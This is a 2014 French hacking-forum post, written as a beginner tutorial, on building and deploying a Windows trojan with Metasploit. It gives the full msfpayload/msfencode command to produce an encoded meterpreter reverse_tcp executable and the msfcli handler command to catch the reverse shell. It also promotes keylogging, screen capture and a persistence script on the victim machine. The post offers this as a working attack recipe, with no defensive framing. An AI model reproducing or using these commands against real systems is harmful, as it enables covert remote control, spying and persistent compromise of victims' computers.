FranceHack Index du Forum
S’enregistrerRechercherFAQMembresGroupesConnexion
Metasploit Attack

 
Répondre au sujet    FranceHack Index du Forum » Débutant » Kali / Backtrack Sujet précédent
Sujet suivant
Metasploit Attack
Auteur Message
Azrakel
Invité

Hors ligne




Message Metasploit Attack Répondre en citant
Attaque avec Metasploit Framework:



Dans ce tuto vous allez voir comment créer et utiliser un trojan.



Les commandes seront d'une couleur Rouge.



=============



Bon voici comment se déroule l'attaque:



MSFPAYLOAD & MSFCLI:



(LHOST = IP machine attaquante)
(LPORT = PORT machine attaquante)
(RHOST = IP machine victime)
(RPORT = PORT machine victime)



Dans cette partie je vais vous montrer comment pénétrer une machine avec un trojan fait maison =_=



Je commence par créer un troyen grâce à la commande :



"msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.25 LPORT=6793 R | msfencode -c 10 -t exe -o /root/Desktop/trojan_test.exe"



Explication:

Je demande à msfpayload d'utiliser le payload (trojan) windows/meterpreter/reverse_tcp. Je configure LHOST soit l'IP de ma machine attaquante ainsi que LPORT soit le port sur lequel la machine victime va venir me contacter et je lui demande de sortir mon troyen en format RAW (R), soit non-encrypté. Je continue en lui demandant, grâce à (|), d'envoyer le résultat de cette commande dans msfencode en spécifiant des paramètres comme -c 10, soit 10 itérations pour l'encryptage, -t exe pour que mon fichier sorte en .exe et enfin le chemin de sortie ou je vais récupérer mon troyen (-o /root/Desktop/trojan_test.exe).



===================================



Maintenant que notre troyen est terminé, dirigez vous à l'endroit ou vous l'avez enregistré (/root/Desktop/ pour ma part), et copiez le sur votre machine victime.

Avant de lancer cet exécutable sur la machine victime, nous devons lancer un listener sur la machine attaquante.
Le listener va écouter sur un port spécifique de notre machine et attendre que la machine infectée lui fasse signe.
Une fois que l'exécutable sera lancé, le trojan ira contacter la machine attaquante (grâce aux paramètres LHOST et LPORT), en d'autres termes, il discutera avec notre listener.
Dès lors que la connexion s'établie, notre machine victime fait signe à notre machine attaquante qu'elle est prête.



=================



Le lancement de ce listener est très simple :

"msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.25 LPORT=6793 E"

Explication

Je configure le programme msfcli pour attendre une connexion sur le LHOST (IP attaquante) et sur le LPORT qui correspond au troyen windows/meterpreter/reverse_tcp.

Une fois que msfcli est en attente d'une connexion, il ne vous reste plus qu'à lancer le troyen sur la machine victime.

Sur la machine victime, double-cliquez sur l'exécutable.
Dès que le troyen sera lancé, vous pourrez remarquer qu'il y a de l'activité dans votre konsole msfcli.
Effectivement, dès que msfcli a détecté la tentative de connexion, il envoie un bout de programme contenant tout un tas de commandes sur la machine victime.
Une fois que msfcli est prêt, il vous affiche ceci :
[*] Started reverse handler on XXX.XXX.XXX.XXXX:xxxx (soit LHOST:LPORT)
[*] Starting the payload handler

=================



Dès que la connexion est effectuée, msfcli vous signale :
[*] Meterpreter session 1 opened (LHOST:LPORT -> RHOST:RPORT)

L'invite de commande de msfcli va alors se transformer en ceci :
meterpreter >

Voila il ne vous reste plus qu'a taper "?" pour vous émerveiller devant les possibilités de ce meterpreter.
Les commandes disponibles sont expliquées brievemment mais on peut facilement comprendre à quoi elles servent.

Un petit avant-gout : Captures des touches tapées au clavier, capture d'écran, vncviewer, et tout un tas de joyeusetés aussi puissantes les une que les autres. Je vous laisse les découvrir par vous même ^^.
On a même la possibilité de lancer un script de persistance, ce qui aura pour effet de lancer le trojan à chaque démarrage de la machine victime.



BON HACK.


By Coco777


Lun 17 Fév - 22:49 (2014)
Publicité






Message Publicité
PublicitéSupprimer les publicités ?

Lun 17 Fév - 22:49 (2014)
Montrer les messages depuis:    
Répondre au sujet    FranceHack Index du Forum » Débutant » Kali / Backtrack Toutes les heures sont au format GMT + 2 Heures
Page 1 sur 1

 

Portail | Index | créer un forum gratuit | Forum gratuit d’entraide | Annuaire des forums gratuits | Signaler une violation | Conditions générales d'utilisation
Powered by phpBB © 2001, 2005 phpBB Group
Design by Freestyle XL / Music Lyrics.Traduction par : phpBB-fr.com